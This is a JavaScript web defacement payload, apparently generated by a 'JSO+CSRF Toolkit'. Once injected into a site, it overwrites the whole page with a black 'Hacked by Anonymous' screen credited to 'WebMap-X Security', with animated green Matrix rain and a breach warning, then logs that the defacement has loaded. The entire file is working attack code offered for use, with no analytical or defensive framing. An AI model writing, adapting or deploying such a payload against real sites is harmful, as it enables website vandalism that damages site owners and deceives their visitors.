// Generated by JSO+CSRF Toolkit
document.documentElement.innerHTML = `
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Hacked by WebMap-X</title>
    <style>
        body {
            background-color: black;
            color: #0f0;
            font-family: 'Courier New', Courier, monospace;
            text-align: center;
            overflow: hidden;
            margin: 0;
            padding: 0;
        }
        .container {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            z-index: 10;
            background: rgba(0, 0, 0, 0.7);
            padding: 20px;
            border: 1px solid #0f0;
            box-shadow: 0 0 20px #0f0;
            max-width: 80%;
        }
        h1 {
            font-size: 3em;
            text-shadow: 0 0 10px #0f0;
            margin-bottom: 5px;
        }
        h2 {
            color: #fff;
            text-shadow: 0 0 5px #fff;
        }
        p {
            font-size: 1.2em;
            line-height: 1.5;
        }
        .image-container img {
            max-width: 300px;
            border: 2px solid #0f0;
            border-radius: 10px;
            margin-top: 15px;
        }
        /* Matrix Rain Canvas */
        canvas {
            display: block;
            position: fixed;
            top: 0;
            left: 0;
            z-index: 1;
        }
    </style>
</head>
<body>
    <canvas id="matrix"></canvas>
    <div class="container">
        <h1>Hacked by Anonymous</h1>
        <h2>Team: WebMap-X Security</h2>
        <p>Your security has been breached. Patch your systems before it's too late.</p>
        
    </div>

    

    <script>
        const canvas = document.getElementById('matrix');
        const ctx = canvas.getContext('2d');

        canvas.width = window.innerWidth;
        canvas.height = window.innerHeight;

        const letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@#\$%^&*()';
        const fontSize = 16;
        const columns = canvas.width / fontSize;
        const drops = [];

        for (let x = 0; x < columns; x++) {
            drops[x] = 1;
        }

        function draw() {
            ctx.fillStyle = 'rgba(0, 0, 0, 0.05)';
            ctx.fillRect(0, 0, canvas.width, canvas.height);

            ctx.fillStyle = '#0f0';
            ctx.font = fontSize + 'px monospace';

            for (let i = 0; i < drops.length; i++) {
                const text = letters.charAt(Math.floor(Math.random() * letters.length));
                ctx.fillText(text, i * fontSize, drops[i] * fontSize);

                if (drops[i] * fontSize > canvas.height && Math.random() > 0.975) {
                    drops[i] = 0;
                }
                drops[i]++;
            }
        }
        setInterval(draw, 33);
        
        window.addEventListener('resize', () => {
            canvas.width = window.innerWidth;
            canvas.height = window.innerHeight;
        });
    </script>
</body>
</html>
`;
console.log("Defacement JSO Loaded.");
